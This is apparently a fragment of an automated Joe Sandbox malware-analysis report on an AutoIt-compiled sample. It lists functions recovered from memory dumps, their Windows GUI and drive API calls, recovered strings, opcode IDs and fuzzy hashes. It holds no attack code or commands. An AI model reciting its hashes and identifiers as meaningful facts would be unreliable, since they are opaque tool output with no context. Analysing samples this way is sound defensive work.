                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: ExceptionFilterUnhandled
                                                    • String ID:
                                                    • API String ID: 3192549508-0
                                                    • Opcode ID: 03b2a213b34f45b6bc5e8679e01725620a5108d51607276702b14d7262014a7c
                                                    • Instruction ID: 74536e93a555ca0174a3be9061235ca17af4f7d0f7f882f9a06e387711d463c8
                                                    • Opcode Fuzzy Hash: 03b2a213b34f45b6bc5e8679e01725620a5108d51607276702b14d7262014a7c
                                                    • Instruction Fuzzy Hash: D8A0113000020CBB8B002B82EC08888BFAEEA022A0B008020F80C800228F32A8208AC0
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 86e7ef17c2e4fdc4a6346c4d1d9f45f106ea414d333ada061bce27894c05cfc6
                                                    • Instruction ID: 169847f1d0297cb28f09be16d1a3ae51f2d62ec058ae5fa9efa1045933318921
                                                    • Opcode Fuzzy Hash: 86e7ef17c2e4fdc4a6346c4d1d9f45f106ea414d333ada061bce27894c05cfc6
                                                    • Instruction Fuzzy Hash: 26221870505656CFDF288B18C4A86FE77A3EB41311F6C446AD8479B392EB349DC6CBA0
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                     • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                    • Instruction ID: 7402605ba3319c58c8504afd29a818cad2b6bd54a518ab621940c133c1d05587
                                                    • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                    • Instruction Fuzzy Hash: 05C186322094730ADB2D8639E5341BEBAE25EA37B131A076DE4B3DF6C5EF10D564DA10
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                     • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                    • Instruction ID: 04734fbc28cd5cbb37c2c52f0e48e82224f21129e59f576f3c3370eb764b373c
                                                    • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                    • Instruction Fuzzy Hash: 7CC1B8322095B309DF6D863AA53407EBBE25BA37B131A076DE4B2DF6D4EF10D524DA10
                                                    APIs
                                                    • CharUpperBuffW.USER32(?,?,0068F910), ref: 006838AF
                                                    • IsWindowVisible.USER32(?), ref: 006838D3
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                     • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: BuffCharUpperVisibleWindow
                                                    • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                    • API String ID: 4105515805-45149045
                                                    • Opcode ID: b9227749f85a289787a34ea362c9ff5dc2e2af8a4470a55bfacf50d12302c648
                                                    • Instruction ID: 89d5ba35a9f4f7e3d19949668142ca07d80010d8acaacfe39355351b437257f7
                                                    • Opcode Fuzzy Hash: b9227749f85a289787a34ea362c9ff5dc2e2af8a4470a55bfacf50d12302c648
                                                    • Instruction Fuzzy Hash: DFD17C70204225DFCB54FF10C451AAABBA3AF94744F104A5CB8865B3E3DB71EE4ACB95
                                                    APIs
                                                    • SetTextColor.GDI32(?,00000000), ref: 0068A89F
                                                    • GetSysColorBrush.USER32(0000000F), ref: 0068A8D0
                                                    • GetSysColor.USER32(0000000F), ref: 0068A8DC
                                                    • SetBkColor.GDI32(?,000000FF), ref: 0068A8F6
                                                    • SelectObject.GDI32(?,?), ref: 0068A905
                                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 0068A930
                                                    • GetSysColor.USER32(00000010), ref: 0068A938
                                                    • CreateSolidBrush.GDI32(00000000), ref: 0068A93F
                                                    • FrameRect.USER32(?,?,00000000), ref: 0068A94E
                                                    • DeleteObject.GDI32(00000000), ref: 0068A955
                                                    • InflateRect.USER32(?,000000FE,000000FE), ref: 0068A9A0
                                                    • FillRect.USER32(?,?,?), ref: 0068A9D2
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0068A9FD
                                                      • Part of subcall function 0068AB60: GetSysColor.USER32(00000012), ref: 0068AB99
                                                      • Part of subcall function 0068AB60: SetTextColor.GDI32(?,?), ref: 0068AB9D
                                                      • Part of subcall function 0068AB60: GetSysColorBrush.USER32(0000000F), ref: 0068ABB3
                                                      • Part of subcall function 0068AB60: GetSysColor.USER32(0000000F), ref: 0068ABBE
                                                      • Part of subcall function 0068AB60: GetSysColor.USER32(00000011), ref: 0068ABDB
                                                      • Part of subcall function 0068AB60: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0068ABE9
                                                      • Part of subcall function 0068AB60: SelectObject.GDI32(?,00000000), ref: 0068ABFA
                                                      • Part of subcall function 0068AB60: SetBkColor.GDI32(?,00000000), ref: 0068AC03
                                                      • Part of subcall function 0068AB60: SelectObject.GDI32(?,?), ref: 0068AC10
                                                      • Part of subcall function 0068AB60: InflateRect.USER32(?,000000FF,000000FF), ref: 0068AC2F
                                                      • Part of subcall function 0068AB60: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0068AC46
                                                      • Part of subcall function 0068AB60: GetWindowLongW.USER32(00000000,000000F0), ref: 0068AC5B
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                     • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                    • String ID:
                                                    • API String ID: 4124339563-0
                                                    • Opcode ID: f3c20e7270b5078c35426c3f7ee4af8a65b1ef937482d8862f059ee8d984f9cb
                                                    • Instruction ID: c8de3d0604063598ff946ca7035ae3948c0493d9ba12b4a6740e0bf58f66fe82
                                                    • Opcode Fuzzy Hash: f3c20e7270b5078c35426c3f7ee4af8a65b1ef937482d8862f059ee8d984f9cb
                                                    • Instruction Fuzzy Hash: D8A17171008301BFD710AFA4DC08A6B7BAAFF89321F105B2AF962D61E1D775D945CB52
                                                    APIs
                                                    • DestroyWindow.USER32(?,?,?), ref: 00602CA2
                                                    • DeleteObject.GDI32(00000000), ref: 00602CE8
                                                    • DeleteObject.GDI32(00000000), ref: 00602CF3
                                                    • DestroyIcon.USER32(00000000,?,?,?), ref: 00602CFE
                                                    • DestroyWindow.USER32(00000000,?,?,?), ref: 00602D09
                                                    • SendMessageW.USER32(?,00001308,?,00000000), ref: 0063C68B
                                                    • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 0063C6C4
                                                    • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 0063CAED
                                                      • Part of subcall function 00601B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00602036,?,00000000,?,?,?,?,006016CB,00000000,?), ref: 00601B9A
                                                    • SendMessageW.USER32(?,00001053), ref: 0063CB2A
                                                    • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0063CB41
                                                    • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0063CB57
                                                    • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0063CB62
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                     • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                    • String ID: 0
                                                    • API String ID: 464785882-4108050209
                                                    • Opcode ID: 1e58717cb66afd725e3824d5760870a68d5cff4831491e20c512cd51d97faf1f
                                                    • Instruction ID: e18e9fca4f440ebd13cf3ba815db83d472a2ce60f6c743f05b0c0528e4b9de26
                                                    • Opcode Fuzzy Hash: 1e58717cb66afd725e3824d5760870a68d5cff4831491e20c512cd51d97faf1f
                                                    • Instruction Fuzzy Hash: E612A330640202EFDB54CF24C899BAAB7E7BF45324F544569F895EB2A2C731EC52CB91
                                                    APIs
                                                    • DestroyWindow.USER32(00000000), ref: 006777F1
                                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 006778B0
                                                    • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 006778EE
                                                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00677900
                                                    • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00677946
                                                    • GetClientRect.USER32(00000000,?), ref: 00677952
                                                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00677996
                                                    • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 006779A5
                                                    • GetStockObject.GDI32(00000011), ref: 006779B5
                                                    • SelectObject.GDI32(00000000,00000000), ref: 006779B9
                                                    • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 006779C9
                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 006779D2
                                                    • DeleteDC.GDI32(00000000), ref: 006779DB
                                                    • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00677A07
                                                    • SendMessageW.USER32(00000030,00000000,00000001), ref: 00677A1E
                                                    • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00677A59
                                                    • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00677A6D
                                                    • SendMessageW.USER32(00000404,00000001,00000000), ref: 00677A7E
                                                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00677AAE
                                                    • GetStockObject.GDI32(00000011), ref: 00677AB9
                                                    • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00677AC4
                                                    • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00677ACE
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                     • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                    • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                    • API String ID: 2910397461-517079104
                                                    • Opcode ID: efc45da3846c826a0f1258ffd2cfbf4ea6eef16f1cea39957c528a0c383d0e96
                                                    • Instruction ID: b9a9aafb43010fb9e221224af838e55e3b53c2e3f035e6ff2e670045675aa6f9
                                                    • Opcode Fuzzy Hash: efc45da3846c826a0f1258ffd2cfbf4ea6eef16f1cea39957c528a0c383d0e96
                                                    • Instruction Fuzzy Hash: 34A16371A40215BFEB14DBA4DC4AFAF7BBAEB44714F108214FA15A72E1D774AD00CB64
                                                    APIs
                                                    • SetErrorMode.KERNEL32(00000001), ref: 0066AF89
                                                    • GetDriveTypeW.KERNEL32(?,0068FAC0,?,\\.\,0068F910), ref: 0066B066
                                                    • SetErrorMode.KERNEL32(00000000,0068FAC0,?,\\.\,0068F910), ref: 0066B1C4
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                     • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: ErrorMode$DriveType
                                                    • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                    • API String ID: 2907320926-4222207086
                                                    • Opcode ID: 939ca0f4b347c4d944dd5e16ee3e255b4e83872c5f75bb35fd337a9327aedb3d
                                                    • Instruction ID: abf7bda2a1e96c205ee7ad2094f35dbe32b4839a3bdc3bc9f13b8795f937b4cc
                                                    • Opcode Fuzzy Hash: 939ca0f4b347c4d944dd5e16ee3e255b4e83872c5f75bb35fd337a9327aedb3d
                                                    • Instruction Fuzzy Hash: 5351C674684305FBCB14EB90C9A28FEB7B3EB163417215029F406E7291DB75ADC2DB52
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                     • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: __wcsnicmp
                                                    • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                    • API String ID: 1038674560-86951937
                                                    • Opcode ID: bdf2fbcf027bc83a8a98a6a93eecf0a46c9c8d61f8e899a9f96c50712efaee77
                                                    • Instruction ID: 40afe2a9800025d314629d458e10810bbc1fc654190ecbe54384c8dda681bdd7
                                                    • Opcode Fuzzy Hash: bdf2fbcf027bc83a8a98a6a93eecf0a46c9c8d61f8e899a9f96c50712efaee77
                                                    • Instruction Fuzzy Hash: 8F813EB0780615B7CB64BB64DC83FEF776BAF15300F044029F941AA2C1FB61EA61C6A5
                                                    APIs
                                                    • GetSysColor.USER32(00000012), ref: 0068AB99
                                                    • SetTextColor.GDI32(?,?), ref: 0068AB9D
                                                    • GetSysColorBrush.USER32(0000000F), ref: 0068ABB3
                                                    • GetSysColor.USER32(0000000F), ref: 0068ABBE
                                                    • CreateSolidBrush.GDI32(?), ref: 0068ABC3
                                                    • GetSysColor.USER32(00000011), ref: 0068ABDB
                                                    • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0068ABE9
                                                    • SelectObject.GDI32(?,00000000), ref: 0068ABFA
                                                    • SetBkColor.GDI32(?,00000000), ref: 0068AC03
                                                    • SelectObject.GDI32(?,?), ref: 0068AC10
                                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 0068AC2F
                                                    • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0068AC46
                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 0068AC5B
                                                    • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0068ACA7
                                                    • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0068ACCE
                                                    • InflateRect.USER32(?,000000FD,000000FD), ref: 0068ACEC
                                                    • DrawFocusRect.USER32(?,?), ref: 0068ACF7
                                                    • GetSysColor.USER32(00000011), ref: 0068AD05
                                                    • SetTextColor.GDI32(?,00000000), ref: 0068AD0D
                                                    • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0068AD21
                                                    • SelectObject.GDI32(?,0068A869), ref: 0068AD38
                                                    • DeleteObject.GDI32(?), ref: 0068AD43
                                                    • SelectObject.GDI32(?,?), ref: 0068AD49
                                                    • DeleteObject.GDI32(?), ref: 0068AD4E
                                                    • SetTextColor.GDI32(?,?), ref: 0068AD54
                                                    • SetBkColor.GDI32(?,?), ref: 0068AD5E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                     • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                    • String ID:
                                                    • API String ID: 1996641542-0
                                                    • Opcode ID: b7b78244fbeff1860db382363607a3c7d839855071fd5dd5bfb07333df576fba
                                                    • Instruction ID: 07ad4b80574e143681924ed1528215cd838f1d0434b4dc17aa109472177a01ee
                                                    • Opcode Fuzzy Hash: b7b78244fbeff1860db382363607a3c7d839855071fd5dd5bfb07333df576fba
                                                    • Instruction Fuzzy Hash: 0A612E71900218FFEF119FA4DC48EAE7B7AEB08720F245226F915AB2A1D7759D40DB90
                                                    APIs
                                                    • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00688D34
                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00688D45
                                                    • CharNextW.USER32(0000014E), ref: 00688D74
                                                    • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00688DB5
                                                    • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00688DCB
                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00688DDC
                                                    • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00688DF9
                                                    • SetWindowTextW.USER32(?,0000014E), ref: 00688E45
                                                    • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00688E5B
                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 00688E8C
                                                    • _memset.LIBCMT ref: 00688EB1
                                                    • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00688EFA
                                                    • _memset.LIBCMT ref: 00688F59
                                                    • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00688F83
                                                    • SendMessageW.USER32(?,00001074,?,00000001), ref: 00688FDB
                                                    • SendMessageW.USER32(?,0000133D,?,?), ref: 00689088
                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 006890AA
                                                    • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 006890F4
                                                    • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00689121
                                                    • DrawMenuBar.USER32(?), ref: 00689130
                                                    • SetWindowTextW.USER32(?,0000014E), ref: 00689158
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                     • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                    • String ID: 0
                                                    • API String ID: 1073566785-4108050209
                                                    • Opcode ID: 02e3ae8a52c9d619b95acce0e939dfb38d8ebb8a50e9c7858202e547d367ba53
                                                    • Instruction ID: 539572ee25e0436dbba8fd4574da62efd3b4431e4068e3066de6c6734cb19674
                                                    • Opcode Fuzzy Hash: 02e3ae8a52c9d619b95acce0e939dfb38d8ebb8a50e9c7858202e547d367ba53
                                                    • Instruction Fuzzy Hash: C9E17070900219BEDF20AF64CC88EFE7BBAEF05710F548259F9559B291DB708A81DF64
                                                    APIs
                                                    • GetCursorPos.USER32(?), ref: 00684C51
                                                    • GetDesktopWindow.USER32 ref: 00684C66
                                                    • GetWindowRect.USER32(00000000), ref: 00684C6D
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00684CCF
                                                    • DestroyWindow.USER32(?), ref: 00684CFB
                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00684D24
                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00684D42
                                                    • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00684D68
                                                    • SendMessageW.USER32(?,00000421,?,?), ref: 00684D7D
                                                    • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00684D90
                                                    • IsWindowVisible.USER32(?), ref: 00684DB0
                                                    • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00684DCB
                                                    • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00684DDF
                                                    • GetWindowRect.USER32(?,?), ref: 00684DF7
                                                    • MonitorFromPoint.USER32(?,?,00000002), ref: 00684E1D
                                                    • GetMonitorInfoW.USER32(00000000,?), ref: 00684E37
                                                    • CopyRect.USER32(?,?), ref: 00684E4E
                                                    • SendMessageW.USER32(?,00000412,00000000), ref: 00684EB9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                     • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                    • String ID: ($0$tooltips_class32
                                                    • API String ID: 698492251-4156429822
                                                    • Opcode ID: d4768a6e62ae72d4614899cc24afa17310ef49d9fcb80a33e210d8e438fcaa1f
                                                    • Instruction ID: 3954e3bbfd57f2d2dd234e7493e10cd0f75ebcf1fdab5e7df07d7e141da45779
                                                    • Opcode Fuzzy Hash: d4768a6e62ae72d4614899cc24afa17310ef49d9fcb80a33e210d8e438fcaa1f
                                                    • Instruction Fuzzy Hash: 39B16B71604341AFDB44DF64C848B6ABBE6FF88314F008A1CF5999B2A2DB71EC45CB95
                                                    APIs
